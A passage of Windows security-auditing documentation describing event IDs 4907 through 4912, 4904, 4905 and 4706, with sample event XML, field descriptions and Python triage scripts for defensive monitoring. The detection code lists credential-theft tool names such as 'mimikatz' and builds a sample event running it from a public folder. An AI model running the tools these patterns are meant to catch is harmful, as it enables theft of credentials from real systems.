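<Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x138eb0</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">Key</Data>
<Data Name="ObjectName">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\EventLog\Internet Explorer</Data>
<Data Name="HandleId">0x2f8</Data>
<Data Name="OldSd">S:AI</Data>
<Data Name="NewSd">S:ARAI(AU;CISA;KA;;;S-1-5-21-3457937927-2839227994-823803824-1104)</Data>
<Data Name="ProcessId">0x120c</Data>
<Data Name="ProcessName">C:\Windows\regedit.exe</Data>
</EventData></Event>"""

if __name__ == "__main__":
    print(evaluate_4907(SAMPLE_4907))
```

The watchlist is matched on the normalized name, so a rule can be written once in the HKEY_* spelling administrators use, while the event keeps reporting the native \REGISTRY path. Paths under ControlSet002 or another control set are a different native prefix and need their own pattern if they matter to you.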
4908(S): Special Groups Logon table modified.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates every time the Special Groups logon table is modified.
This event also generates during system startup.
This event is always logged regardless of the "Audit Policy Change" sub-category setting.
More information about Special Groups auditing can be found here:
http://blogs.technet.com/b/askds/archive/2008/03/11/special-groups-auditing-via-group-policy-preferences.aspx
https://support.microsoft.com/kb/947223

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4908</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T00:20:40.210246600Z" />
<EventRecordID>1049511</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="532" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SidList">%{S-1-5-21-3457937927-2839227994-823803824-512}</Data>
</EventData>
</Event>
Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Special Groups [Type = UnicodeString]: contains current list of SIDs (groups or accounts) which are members of
Special Groups. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

The “HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\Audit\SpecialGroups” registry value contains
the current list of SIDs which are included in Special Groups:

Security Monitoring Recommendations
For 4908(S): Special Groups Logon table modified.
If you use the Special Groups feature, then this event should always be monitored, especially on high value
assets or computers. If this change was not planned, investigate the reason for the change.
If you don’t use the Special Groups feature, then this event should always be monitored because it indicates
use of the Special Groups feature outside of your standard procedures.
4912(S): Per User Audit Policy was changed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates every time Per User Audit Policy is changed.
This event is always logged regardless of the "Audit Policy Change" sub-category setting.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4912</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-30T23:43:07.363195100Z" />
<EventRecordID>1049452</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="1660" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x11ae30</Data>
<Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
<Data Name="CategoryId">%%8276</Data>
<Data Name="SubcategoryId">%%13312</Data>
<Data Name="SubcategoryGuid">{0CCE922B-69AE-11D9-BED3-505054503030}</Data>
<Data Name="AuditPolicyChanges">%%8452</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that made a change to per-user audit policy. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made a change to per-user audit
policy.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Policy For Account:
Security ID [Type = SID]: SID of account for which the Per User Audit Policy was changed. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.
Policy Change Details:
Category [Type = UnicodeString]: the name of the auditing category whose subcategory state was changed.
Possible values are:
Account Logon
Account Management
Detailed Tracking
DS Access
Logon/Logoff
Object Access
Policy Change
Privilege Use
System
Subcategory [Type = UnicodeString]: the name of the auditing subcategory whose state was changed. Possible
values:
Audit Credential Validation
Audit Kerberos Authentication Service
Audit Kerberos Service Ticket Operations
Audit Other Logon/Logoff Events
Audit Application Group Management
Audit Computer Account Management
Audit Distribution Group Management
Audit Other Account Management Events
Audit Security Group Management
Audit User Account Management
Audit DPAPI Activity
Audit Process Creation
Audit Other Object Access Events
Audit Registry
Audit SAM
Audit Policy Change
Audit Authentication Policy Change
Audit Authorization Policy Change
Group Membership
Audit Process Termination
Audit RPC Events
Audit Detailed Directory Service Replication
Audit Directory Service Access
Audit Directory Service Changes
Audit Directory Service Replication
Audit Account Lockout
Audit IPsec Extended Mode
Audit IPsec Main Mode
Audit IPsec Quick Mode
Audit Logoff
Audit Logon
Audit Filtering Platform Policy Change
Audit MPSSVC Rule-Level Policy Change
Audit Other Policy Change Events
Audit Non-Sensitive Privilege Use
Audit Sensitive Privilege Use
Audit Other Privilege Use Events
Audit Network Policy Server
Audit Special Logon
Audit Application Generated
Audit Certification Services
Audit Detailed File Share
Audit File Share
Audit File System
Audit Filtering Platform Connection
Audit Filtering Platform Packet Drop
Audit Handle Manipulation
Audit Kernel Object
Audit IPsec Driver
Audit Other System Events
Audit Security State Change
Audit Security System Extension
Audit System Integrity
Audit PNP Activity

Subcategory GUID [Type = GUID]: the unique GUID of the changed subcategory.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

To see the GUID of each subcategory, run the following command: “auditpol /list /subcategory:* /v”.
Changes [Type = UnicodeString]: the changes made to the subcategory. Possible values are:
Success include removed
Success include added
Failure include removed
Failure include added
Success exclude removed
Success exclude added
Failure exclude removed
Failure exclude added

Security Monitoring Recommendations


For 4912(S): Per User Audit Policy was changed.
If you use the Per-user audit feature, then this event should always be monitored, especially on high value
assets or computers. If this change was not planned, investigate the reason for the change.
If you don’t use the Per-user audit feature, then this event should still always be monitored, because it
indicates use of the Per-user audit feature outside of your standard procedures.
4904(S): An attempt was made to register a security event source.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates every time a new security event source is registered.
You can typically see this event during system startup, if specific roles (Internet Information Services, for
example) are installed in the system.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4904</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T00:53:01.030688000Z" />
<EventRecordID>1049538</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="548" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="AuditSourceName">FSRM Audit</Data>
<Data Name="EventSourceId">0x1cc4e</Data>
<Data Name="ProcessId">0x688</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to register a security event source. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to register a
security event source.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted to register the security
event source. Process ID (PID) is a number used by the operating system to uniquely identify an active
process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column).

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Event Source:
Source Name [Type = UnicodeString]: the name of the registered security event source. You can see all
registered security event source names in this registry path:
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security”.
Event Source ID [Type = HexInt64]: the unique hexadecimal identifier of registered security event source.

Security Monitoring Recommendations


For 4904(S): An attempt was made to register a security event source.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If you have a pre-defined list of allowed security event sources for specific computers or computer types,
then you can use this event and check whether “Event Source\Source Name” is in your defined list.
Typically this event has an informational purpose.
4905(S): An attempt was made to unregister a security event source.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Policy Change
Event Description:
This event generates every time a security event source is unregistered.
You typically see this event if specific roles were removed, for example, Internet Information Services.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4905</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13568</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T17:39:12.039825000Z" />
<EventRecordID>1049718</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="1888" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="AuditSourceName">IIS-METABASE</Data>
<Data Name="EventSourceId">0x20c15f</Data>
<Data Name="ProcessId">0xd90</Data>
<Data Name="ProcessName">-</Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to unregister a security event source. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to unregister a
security event source.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process that attempted to unregister the
security event source. Process ID (PID) is a number used by the operating system to uniquely identify an
active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID
column).

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Event Source:
Source Name [Type = UnicodeString]: the name of the unregistered security event source. You can see all
registered security event source names in this registry path:
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security”.
Event Source ID [Type = HexInt64]: the unique hexadecimal identifier of unregistered security event
source.

Security Monitoring Recommendations


For 4905(S): An attempt was made to unregister a security event source.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Because this event is typically triggered by the SYSTEM account, we recommend that you report it
whenever “Subject\Security ID” is not SYSTEM.
If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz”
or “cain.exe”), check for these substrings in “Process Name.”
If you have a list of critical security event sources which should never have been unregistered, then you can
use this event and check the “Event Source\Source Name.”
Typically this event has an informational purpose.
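The recommendations for 4904 and 4905 above reduce to a handful of field checks: subject not SYSTEM, process outside the standard folders or inside a restricted one, restricted words in the process name, and the source name against a per-role list. The following is an added example, not Microsoft's code or part of this documentation. It parses events in the XML shape shown on this page and applies those checks to a batch. The allowed-source and critical-source lists, the folder lists, and the sample records are illustrative placeholders constructed for the example; the first two samples mirror the 4904 and 4905 records above.

```python
"""Triage 4904/4905 "security event source" records with the checks recommended above.

Added example, not Microsoft's tooling. The allow/deny lists are illustrative
placeholders; the sample events are constructed (the first two mirror the
4904 and 4905 records shown on this page)."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
SYSTEM_SID = "S-1-5-18"

# Folders treated as "standard" (prefixes) and "restricted" (path fragments), compared lower-case.
STANDARD_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
RESTRICTED_DIRS = ("\\temporary internet files\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
RESTRICTED_WORDS = ("mimikatz", "cain.exe")
# Hypothetical per-role lists: sources expected on this DC, and sources that must never be unregistered.
ALLOWED_SOURCES = {"FSRM Audit", "IIS-METABASE", "Security Account Manager", "DS"}
CRITICAL_SOURCES = {"Security Account Manager", "DS"}


def parse_event(xml_text: str) -> dict:
    """Flatten one <Event> into a dict: EventID, Computer, plus every <Data Name=...> value."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    rec = {"EventID": int(system.findtext("e:EventID", namespaces=NS)),
           "Computer": system.findtext("e:Computer", namespaces=NS)}
    for data in root.iterfind("e:EventData/e:Data", NS):
        rec[data.get("Name")] = (data.text or "").strip()
    return rec


def check_event_source(rec: dict) -> list:
    """Return the monitoring findings for one 4904 (register) / 4905 (unregister) record."""
    eid = rec["EventID"]
    if eid not in (4904, 4905):
        return []
    findings = []
    if rec.get("SubjectUserSid") != SYSTEM_SID:
        findings.append("subject is not SYSTEM: %s\\%s" % (rec.get("SubjectDomainName"), rec.get("SubjectUserName")))
    proc = rec.get("ProcessName", "-")
    if proc != "-":  # 4905 may report "-" when the process has already exited
        low = proc.lower()
        if not low.startswith(STANDARD_DIRS):
            findings.append("process outside standard folders: " + proc)
        if any(frag in low for frag in RESTRICTED_DIRS):
            findings.append("process in restricted folder: " + proc)
        if any(word in low for word in RESTRICTED_WORDS):
            findings.append("process name contains restricted word: " + proc)
    source = rec.get("AuditSourceName", "")
    if eid == 4904 and source not in ALLOWED_SOURCES:
        findings.append("unexpected event source registered: " + source)
    if eid == 4905 and source in CRITICAL_SOURCES:
        findings.append("critical event source unregistered: " + source)
    return findings


def make_event(event_id, sid, user, source, process) -> str:
    """Build a minimal Security-channel event in the schema shown above (constructed sample)."""
    return f"""<Event xmlns="{NS['e']}">
  <System><EventID>{event_id}</EventID><Computer>DC01.contoso.local</Computer></System>
  <EventData>
    <Data Name="SubjectUserSid">{sid}</Data>
    <Data Name="SubjectUserName">{user}</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="AuditSourceName">{source}</Data>
    <Data Name="ProcessName">{process}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    make_event(4904, SYSTEM_SID, "DC01$", "FSRM Audit", r"C:\Windows\System32\svchost.exe"),
    make_event(4905, SYSTEM_SID, "DC01$", "IIS-METABASE", "-"),
    # Constructed suspicious record: a user account registers an unknown source from a user-writable folder.
    make_event(4904, "S-1-5-21-3457937927-2839227994-823803824-1104", "dadmin", "Updater",
               r"C:\Users\Public\mimikatz.exe"),
]


def triage(xml_events) -> list:
    """Return (EventID, source name, findings) for every event that produced at least one finding."""
    results = []
    for xml_text in xml_events:
        rec = parse_event(xml_text)
        findings = check_event_source(rec)
        if findings:
            results.append((rec["EventID"], rec.get("AuditSourceName"), findings))
    return results


if __name__ == "__main__":
    for eid, source, findings in triage(SAMPLE_EVENTS):
        print(eid, source)
        for finding in findings:
            print("   -", finding)
```

Only the constructed third record produces findings; the two records taken from the page are clean under these lists. In production the same `check_event_source` would run over events exported from the Security channel (for example with `wevtutil qe Security /f:xml`), and the lists would come from your own baseline of the computer role.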
Audit Authentication Policy Change
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Authentication Policy Change determines whether the operating system generates audit events when
changes are made to authentication policy.
Changes made to authentication policy include:
Creation, modification, and removal of forest and domain trusts.
Changes to Kerberos policy under Computer Configuration\Windows Settings\Security Settings\Account
Policies\Kerberos Policy.
When any of the following user logon rights is granted to a user or group:
Access this computer from the network
Allow logon locally
Allow logon through Remote Desktop
Logon as a batch job
Logon as a service
Namespace collision, such as when an added trust collides with an existing namespace name.
This setting is useful for tracking changes in domain-level and forest-level trust and privileges that are granted
to user accounts or groups.
Event volume: Low.

Computer Type: Domain Controller
General Success: Yes. General Failure: No. Stronger Success: Yes. Stronger Failure: No.
Comments: On domain controllers, it is important to enable Success audit for this subcategory to be able to get
information related to operations with domain and forest trusts, changes in Kerberos policy and some other
events included in this subcategory. This subcategory doesn’t have Failure events, so there is no
recommendation to enable Failure auditing for this subcategory.

Computer Type: Member Server
General Success: Yes. General Failure: No. Stronger Success: Yes. Stronger Failure: No.
Comments: On member servers it is important to enable Success audit for this subcategory to be able to get
information related to changes in user logon rights policies and password policy changes. This subcategory
doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Computer Type: Workstation
General Success: Yes. General Failure: No. Stronger Success: Yes. Stronger Failure: No.
Comments: On workstations it is important to enable Success audit for this subcategory to be able to get
information related to changes in user logon rights policies and password policy changes. This subcategory
doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4670(S): Permissions on an object were changed
4706(S): A new trust was created to a domain.
4707(S): A trust to a domain was removed.
4716(S): Trusted domain information was modified.
4713(S): Kerberos policy was changed.
4717(S): System security access was granted to an account.
4718(S): System security access was removed from an account.
4739(S): Domain Policy was changed.
4864(S): A namespace collision was detected.
4865(S): A trusted forest information entry was added.
4866(S): A trusted forest information entry was removed.
4867(S): A trusted forest information entry was modified.
4706(S): A new trust was created to a domain.
4/5/2019 • 7 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Authentication Policy Change
Event Description:
This event generates when a new trust was created to a domain.
This event is generated only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4706</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13569</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-01T20:41:13.189445500Z" />
<EventRecordID>1049759</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="4900" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="DomainName">corp.contoso.local</Data>
<Data Name="DomainSid">S-1-5-21-2226861337-2836268956-2433141405</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e99d6</Data>
<Data Name="TdoType">2</Data>
<Data Name="TdoDirection">3</Data>
<Data Name="TdoAttributes">32</Data>
<Data Name="SidFilteringEnabled">%%1796</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “create domain trust” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create domain trust”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Trusted Domain:
Domain Name [Type = UnicodeString]: the name of the new trusted domain.
Domain ID [Type = SID]: SID of the new trusted domain. Event Viewer automatically tries to resolve SIDs and
show the account name. If the SID cannot be resolved, you will see the source data in the event.
Trust Information:
Trust Type [Type = UInt32]: the type of the new trust. Possible values for this field (value = attribute value:
description):

1 = TRUST_TYPE_DOWNLEVEL: The domain controller of the trusted domain is a computer running an operating
system earlier than Windows 2000.

2 = TRUST_TYPE_UPLEVEL: The domain controller of the trusted domain is a computer running Windows 2000 or
later.

3 = TRUST_TYPE_MIT: The trusted domain is running a non-Windows, RFC4120-compliant Kerberos distribution.
This type of trust is distinguished in that (1) a SID is not required for the TDO, and (2) the default key types
include the DES-CBC and DES-CRC encryption types (see [RFC4120] section 8.1).

4 = TRUST_TYPE_DCE: The trusted domain is a DCE realm. Historical reference, this value is not used in
Windows.

Trust Direction [Type = UInt32]: the direction of the new trust. Possible values for this field (value = attribute
value: description):

0 = TRUST_DIRECTION_DISABLED: The trust relationship exists, but it has been disabled.

1 = TRUST_DIRECTION_INBOUND: The trusted domain trusts the primary domain to perform operations such as
name lookups and authentication.

2 = TRUST_DIRECTION_OUTBOUND: The primary domain trusts the trusted domain to perform operations such as
name lookups and authentication.

3 = TRUST_DIRECTION_BIDIRECTIONAL: Both domains trust one another for operations such as name lookups and
authentication.

Trust Attributes [Type = UInt32]: the attributes of the new trust, logged as a decimal value. The field is a bit
mask, so several attributes may be combined: convert the decimal value to hexadecimal and look up each set bit
in the list below (value = attribute value: description).

0x1 = TRUST_ATTRIBUTE_NON_TRANSITIVE: If this bit is set, then the trust cannot be used transitively. For
example, if domain A trusts domain B, which in turn trusts domain C, and the A<-->B trust has this attribute
set, then a client in domain A cannot authenticate to a server in domain C over the A<-->B<-->C trust linkage.

0x2 = TRUST_ATTRIBUTE_UPLEVEL_ONLY: If this bit is set in the attribute, then only Windows 2000 operating
system and newer clients may use the trust link. Netlogon does not consume trust objects that have this flag set.

0x4 = TRUST_ATTRIBUTE_QUARANTINED_DOMAIN: If this bit is set, the trusted domain is quarantined and is
subject to the rules of SID Filtering as described in [MS-PAC] section 4.1.2.2.

0x8 = TRUST_ATTRIBUTE_FOREST_TRANSITIVE: If this bit is set, the trust link is a cross-forest trust [MS-KILE]
between the root domains of two forests, both of which are running in a forest functional level of
DS_BEHAVIOR_WIN2003 or greater. Only evaluated on Windows Server 2003, Windows Server 2008, Windows
Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, and Windows Server 2016. Can only be set if
forest and trusted forest are running in a forest functional level of DS_BEHAVIOR_WIN2003 or greater.

0x10 = TRUST_ATTRIBUTE_CROSS_ORGANIZATION: If this bit is set, then the trust is to a domain or forest that is
not part of the organization. The behavior controlled by this bit is explained in [MS-KILE] section 3.3.5.7.5 and
[MS-APDS] section 3.1.5. Only evaluated on Windows Server 2003, Windows Server 2008, Windows Server 2008
R2, Windows Server 2012, Windows Server 2012 R2, and Windows Server 2016. Can only be set if forest and
trusted forest are running in a forest functional level of DS_BEHAVIOR_WIN2003 or greater.

0x20 = TRUST_ATTRIBUTE_WITHIN_FOREST: If this bit is set, then the trusted domain is within the same forest.
Only evaluated on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012,
Windows Server 2012 R2, and Windows Server 2016.

0x40 = TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL: If this bit is set, then a cross-forest trust to a domain is to be
treated as an external trust for the purposes of SID Filtering. Cross-forest trusts are more stringently filtered
than external trusts. This attribute relaxes those cross-forest trusts to be equivalent to external trusts. For
more information on how each trust type is filtered, see [MS-PAC] section 4.1.2.2. Only evaluated on Windows
Server 2003, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2,
and Windows Server 2016. Only evaluated if SID Filtering is used. Only evaluated on cross-forest trusts having
TRUST_ATTRIBUTE_FOREST_TRANSITIVE. Can only be set if forest and trusted forest are running in a forest
functional level of DS_BEHAVIOR_WIN2003 or greater.

0x80 = TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION: This bit is set on trusts with the trustType set to
TRUST_TYPE_MIT, which are capable of using RC4 keys. Historically, MIT Kerberos distributions supported only
DES and 3DES keys ([RFC4120], [RFC3961]). MIT 1.4.1 adopted the RC4HMAC encryption type common to
Windows 2000 [MS-KILE], so trusted domains deploying later versions of the MIT distribution required this bit.
